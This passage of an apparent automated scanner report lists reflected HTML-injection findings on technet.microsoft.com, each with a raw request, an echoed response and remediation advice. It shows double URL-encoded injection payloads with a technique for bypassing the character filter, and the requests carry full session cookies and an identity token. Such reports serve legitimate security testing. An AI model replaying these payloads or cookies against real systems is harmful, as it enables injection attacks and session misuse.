Content-Length: 10199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library17a18"><a>8384bc7b34d/bb727159" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3036%2522%253e%253ca%253ec8fce23daed was submitted in the REST URL parameter 3. This input was echoed as f3036"><a>c8fce23daed in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727159.aspxf3036%2522%253e%253ca%253ec8fce23daed HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10210
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727159.aspxf3036"><a>c8fce23daed" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12f8c%2522%253e%253ca%253e77dc383cfad was submitted in the REST URL parameter 1. This input was echoed as 12f8c"><a>77dc383cfad in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us12f8c%2522%253e%253ca%253e77dc383cfad/library/bb727169.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us12f8c"><a>77dc383cfad/library/bb727169" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dde0%2522%253e%253ca%253ebebfe93a9eb was submitted in the REST URL parameter 2. This input was echoed as 2dde0"><a>bebfe93a9eb in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library2dde0%2522%253e%253ca%253ebebfe93a9eb/bb727169.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library2dde0"><a>bebfe93a9eb/bb727169" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b19a%2522%253e%253ca%253e7b99dd35ffe was submitted in the REST URL parameter 3. This input was echoed as 6b19a"><a>7b99dd35ffe in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727169.aspx6b19a%2522%253e%253ca%253e7b99dd35ffe HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727169.aspx6b19a"><a>7b99dd35ffe" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 468aa%2522%253e%253ca%253e16313fd53ac was submitted in the REST URL parameter 1. This input was echoed as 468aa"><a>16313fd53ac in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us468aa%2522%253e%253ca%253e16313fd53ac/library/bb742437.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:20:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us468aa"><a>16313fd53ac/library/bb742437" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 148c8%2522%253e%253ca%253e87400f70296 was submitted in the REST URL parameter 2. This input was echoed as 148c8"><a>87400f70296 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library148c8%2522%253e%253ca%253e87400f70296/bb742437.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:21:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library148c8"><a>87400f70296/bb742437" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0703%2522%253e%253ca%253e705b67e6431 was submitted in the REST URL parameter 3. This input was echoed as b0703"><a>705b67e6431 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb742437.aspxb0703%2522%253e%253ca%253e705b67e6431 HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
